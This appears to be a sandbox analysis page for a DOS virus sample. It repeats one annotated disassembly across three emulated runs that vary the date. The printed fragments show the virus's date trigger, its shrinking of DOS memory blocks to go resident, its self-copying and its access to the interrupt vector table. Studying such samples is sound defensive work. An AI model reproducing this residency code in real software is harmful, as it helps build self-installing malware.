Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2371


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:34:57.048145654Z 250 PC: 12b25 | UNKNOWN!
; Disassembly starting at the return address of DOS syscall op 42 (0x2A,
; "Get date"). The lines appear to be a straight-line decode of the bytes after
; the call site, not necessarily the path that executed.
; INT 21h/AH=2Ah returns the day of the month in DL, so the first compare is a
; date trigger for day 13 (0x0d). The job records on this page ("DateBased",
; "Day":1 and "Day":13) vary exactly this input.
2018-12-17T22:34:57.049449405Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38                        ; not the 13th -> flag byte is left unchanged
0x12b32: mov byte ptr cs:[bp + 0x71a], 1    ; day == 13: set flag at cs:[bp+0x71a]; bp presumably holds the code's load offset - confirm
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax                         ; ds = es - 1; if es still holds the PSP segment this is the program's memory control block (MCB) - es is set outside this listing
0x12b3d: cmp byte ptr [0], 0x5a             ; MCB type byte: 0x5a ('Z') marks the last block in the DOS chain
0x12b42: jne 0x12b89                        ; not the last block -> skip the steps below (target not shown)
0x12b44: sub word ptr [3], 0x180            ; MCB size field (in paragraphs) reduced by 0x180 paragraphs = 6144 bytes
0x12b4a: sub word ptr [0x12], 0x180         ; ds:0x12 is PSP:0x02 under the assumption above (top-of-memory segment); lowered by the same amount
0x12b50: mov es, word ptr [0x12]            ; es = segment of the region just carved off the top of memory
0x12b54: push cs
0x12b55: pop ds                             ; ds = cs (source segment for the copy)
0x12b56: mov si, bp                         ; source offset = bp
0x12b58: mov cx, 0x430                      ; copy count
0x12b5b: xor di, di                         ; destination offset 0
; Copies cx units from cs:bp to es:0, i.e. the code relocates itself into the
; block it just reserved. NOTE(review): the instruction is only two bytes long
; (next address is 0x12b5f), so it carries no operand-size prefix; in 16-bit
; code that would be a word copy (0x430 * 2 = 2144 bytes) rather than the dword
; form printed here - check the raw bytes before relying on the length.
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax                         ; ds = 0, the segment of the real-mode interrupt vector table
0x12b63: push ds                            ; listing ends here; what is done with segment 0 is not shown
; Analyst note: the 0x180-paragraph drop in the last MCB and in the PSP
; top-of-memory word is an observable artifact when comparing the DOS memory
; map before and after the sample runs.
; Disassembly starting at the return address of DOS syscall op 44 (0x2C,
; "Get time"). INT 21h/AH=2Ch returns seconds in DH and hundredths in DL, so
; DX is stored here as a clock-derived 16-bit seed.
2018-12-17T22:34:57.050983381Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax                             ; restore the ax saved before the call (the push is outside this listing)
0x12ff5: ret                                ; end of the seeding routine
; 0x12ff6 follows a ret, so it is a separate routine: a 16-bit linear
; congruential generator. state = state * 0x7ab5 + 0x3619 (mod 0x10000); the
; new state is then multiplied by the value the caller passed in ax and the
; high word of that product (dx) is the result, i.e. the state scaled into
; 0..ax-1, with 0 replaced by 1.
0x12ff6: push ax                            ; keep the caller's range argument
0x12ff7: mov ax, word ptr [0x721]           ; load current state
0x12ffa: mov cx, 0x7ab5                     ; multiplier
0x12ffd: mul cx                             ; dx:ax = state * 0x7ab5; only the low word is kept
0x12fff: add ax, 0x3619                     ; increment
0x13002: mov word ptr [0x721], ax           ; store new state
0x13005: pop cx                             ; cx = caller's range argument
0x13006: mul cx                             ; dx:ax = state * range; dx = scaled value
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx                             ; never return 0
0x1300e: ret                                ; result in dx; ax and cx are overwritten
; The bytes after this ret are probably data decoded as code: the one-byte
; opcodes of inc bx / dec ax / dec bx / dec sp / dec cx are 0x43 0x48 0x4b 0x4c
; 0x49, which is ASCII "CHKLI". Treat them as the start of a string (the
; listing is cut off) and confirm against the raw bytes.
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx
; Analyst note: because the seed comes from the clock, pin the emulated time
; when comparing runs so that values derived from this generator are
; reproducible.

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6260,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:59.262758182Z 250 PC: 12b25 | UNKNOWN!
; Disassembly starting at the return address of DOS syscall op 42 (0x2A,
; "Get date"). The lines appear to be a straight-line decode of the bytes after
; the call site, not necessarily the path that executed.
; INT 21h/AH=2Ah returns the day of the month in DL, so the first compare is a
; date trigger for day 13 (0x0d). The job records on this page ("DateBased",
; "Day":1 and "Day":13) vary exactly this input.
2018-12-25T11:58:59.264602504Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38                        ; not the 13th -> flag byte is left unchanged
0x12b32: mov byte ptr cs:[bp + 0x71a], 1    ; day == 13: set flag at cs:[bp+0x71a]; bp presumably holds the code's load offset - confirm
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax                         ; ds = es - 1; if es still holds the PSP segment this is the program's memory control block (MCB) - es is set outside this listing
0x12b3d: cmp byte ptr [0], 0x5a             ; MCB type byte: 0x5a ('Z') marks the last block in the DOS chain
0x12b42: jne 0x12b89                        ; not the last block -> skip the steps below (target not shown)
0x12b44: sub word ptr [3], 0x180            ; MCB size field (in paragraphs) reduced by 0x180 paragraphs = 6144 bytes
0x12b4a: sub word ptr [0x12], 0x180         ; ds:0x12 is PSP:0x02 under the assumption above (top-of-memory segment); lowered by the same amount
0x12b50: mov es, word ptr [0x12]            ; es = segment of the region just carved off the top of memory
0x12b54: push cs
0x12b55: pop ds                             ; ds = cs (source segment for the copy)
0x12b56: mov si, bp                         ; source offset = bp
0x12b58: mov cx, 0x430                      ; copy count
0x12b5b: xor di, di                         ; destination offset 0
; Copies cx units from cs:bp to es:0, i.e. the code relocates itself into the
; block it just reserved. NOTE(review): the instruction is only two bytes long
; (next address is 0x12b5f), so it carries no operand-size prefix; in 16-bit
; code that would be a word copy (0x430 * 2 = 2144 bytes) rather than the dword
; form printed here - check the raw bytes before relying on the length.
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax                         ; ds = 0, the segment of the real-mode interrupt vector table
0x12b63: push ds                            ; listing ends here; what is done with segment 0 is not shown
; Analyst note: the 0x180-paragraph drop in the last MCB and in the PSP
; top-of-memory word is an observable artifact when comparing the DOS memory
; map before and after the sample runs.
; Disassembly starting at the return address of DOS syscall op 44 (0x2C,
; "Get time"). INT 21h/AH=2Ch returns seconds in DH and hundredths in DL, so
; DX is stored here as a clock-derived 16-bit seed.
2018-12-25T11:58:59.267100232Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax                             ; restore the ax saved before the call (the push is outside this listing)
0x12ff5: ret                                ; end of the seeding routine
; 0x12ff6 follows a ret, so it is a separate routine: a 16-bit linear
; congruential generator. state = state * 0x7ab5 + 0x3619 (mod 0x10000); the
; new state is then multiplied by the value the caller passed in ax and the
; high word of that product (dx) is the result, i.e. the state scaled into
; 0..ax-1, with 0 replaced by 1.
0x12ff6: push ax                            ; keep the caller's range argument
0x12ff7: mov ax, word ptr [0x721]           ; load current state
0x12ffa: mov cx, 0x7ab5                     ; multiplier
0x12ffd: mul cx                             ; dx:ax = state * 0x7ab5; only the low word is kept
0x12fff: add ax, 0x3619                     ; increment
0x13002: mov word ptr [0x721], ax           ; store new state
0x13005: pop cx                             ; cx = caller's range argument
0x13006: mul cx                             ; dx:ax = state * range; dx = scaled value
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx                             ; never return 0
0x1300e: ret                                ; result in dx; ax and cx are overwritten
; The bytes after this ret are probably data decoded as code: the one-byte
; opcodes of inc bx / dec ax / dec bx / dec sp / dec cx are 0x43 0x48 0x4b 0x4c
; 0x49, which is ASCII "CHKLI". Treat them as the start of a string (the
; listing is cut off) and confirm against the raw bytes.
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx
; Analyst note: because the seed comes from the clock, pin the emulated time
; when comparing runs so that values derived from this generator are
; reproducible.

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6260,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:00.802016437Z 250 PC: 12b25 | UNKNOWN!
; Disassembly starting at the return address of DOS syscall op 42 (0x2A,
; "Get date"). The lines appear to be a straight-line decode of the bytes after
; the call site, not necessarily the path that executed.
; INT 21h/AH=2Ah returns the day of the month in DL, so the first compare is a
; date trigger for day 13 (0x0d). The job records on this page ("DateBased",
; "Day":1 and "Day":13) vary exactly this input.
2018-12-25T11:59:00.802982922Z 42 PC: 12b2d | Get date 0x12b2d: cmp dl, 0xd
0x12b30: jne 0x12b38                        ; not the 13th -> flag byte is left unchanged
0x12b32: mov byte ptr cs:[bp + 0x71a], 1    ; day == 13: set flag at cs:[bp+0x71a]; bp presumably holds the code's load offset - confirm
0x12b38: mov ax, es
0x12b3a: dec ax
0x12b3b: mov ds, ax                         ; ds = es - 1; if es still holds the PSP segment this is the program's memory control block (MCB) - es is set outside this listing
0x12b3d: cmp byte ptr [0], 0x5a             ; MCB type byte: 0x5a ('Z') marks the last block in the DOS chain
0x12b42: jne 0x12b89                        ; not the last block -> skip the steps below (target not shown)
0x12b44: sub word ptr [3], 0x180            ; MCB size field (in paragraphs) reduced by 0x180 paragraphs = 6144 bytes
0x12b4a: sub word ptr [0x12], 0x180         ; ds:0x12 is PSP:0x02 under the assumption above (top-of-memory segment); lowered by the same amount
0x12b50: mov es, word ptr [0x12]            ; es = segment of the region just carved off the top of memory
0x12b54: push cs
0x12b55: pop ds                             ; ds = cs (source segment for the copy)
0x12b56: mov si, bp                         ; source offset = bp
0x12b58: mov cx, 0x430                      ; copy count
0x12b5b: xor di, di                         ; destination offset 0
; Copies cx units from cs:bp to es:0, i.e. the code relocates itself into the
; block it just reserved. NOTE(review): the instruction is only two bytes long
; (next address is 0x12b5f), so it carries no operand-size prefix; in 16-bit
; code that would be a word copy (0x430 * 2 = 2144 bytes) rather than the dword
; form printed here - check the raw bytes before relying on the length.
0x12b5d: rep movsd dword ptr es:[di], dword ptr [si]
0x12b5f: xor ax, ax
0x12b61: mov ds, ax                         ; ds = 0, the segment of the real-mode interrupt vector table
0x12b63: push ds                            ; listing ends here; what is done with segment 0 is not shown
; Analyst note: the 0x180-paragraph drop in the last MCB and in the PSP
; top-of-memory word is an observable artifact when comparing the DOS memory
; map before and after the sample runs.
; Disassembly starting at the return address of DOS syscall op 44 (0x2C,
; "Get time"). INT 21h/AH=2Ch returns seconds in DH and hundredths in DL, so
; DX is stored here as a clock-derived 16-bit seed.
2018-12-25T11:59:00.807102678Z 44 PC: 12ff0 | Get time 0x12ff0: mov word ptr [0x721], dx
0x12ff4: pop ax                             ; restore the ax saved before the call (the push is outside this listing)
0x12ff5: ret                                ; end of the seeding routine
; 0x12ff6 follows a ret, so it is a separate routine: a 16-bit linear
; congruential generator. state = state * 0x7ab5 + 0x3619 (mod 0x10000); the
; new state is then multiplied by the value the caller passed in ax and the
; high word of that product (dx) is the result, i.e. the state scaled into
; 0..ax-1, with 0 replaced by 1.
0x12ff6: push ax                            ; keep the caller's range argument
0x12ff7: mov ax, word ptr [0x721]           ; load current state
0x12ffa: mov cx, 0x7ab5                     ; multiplier
0x12ffd: mul cx                             ; dx:ax = state * 0x7ab5; only the low word is kept
0x12fff: add ax, 0x3619                     ; increment
0x13002: mov word ptr [0x721], ax           ; store new state
0x13005: pop cx                             ; cx = caller's range argument
0x13006: mul cx                             ; dx:ax = state * range; dx = scaled value
0x13008: cmp dx, 0
0x1300b: jne 0x1300e
0x1300d: inc dx                             ; never return 0
0x1300e: ret                                ; result in dx; ax and cx are overwritten
; The bytes after this ret are probably data decoded as code: the one-byte
; opcodes of inc bx / dec ax / dec bx / dec sp / dec cx are 0x43 0x48 0x4b 0x4c
; 0x49, which is ASCII "CHKLI". Treat them as the start of a string (the
; listing is cut off) and confirm against the raw bytes.
0x1300f: inc bx
0x13010: dec ax
0x13011: dec bx
0x13012: dec sp
0x13013: dec cx
; Analyst note: because the seed comes from the clock, pin the emulated time
; when comparing runs so that values derived from this generator are
; reproducible.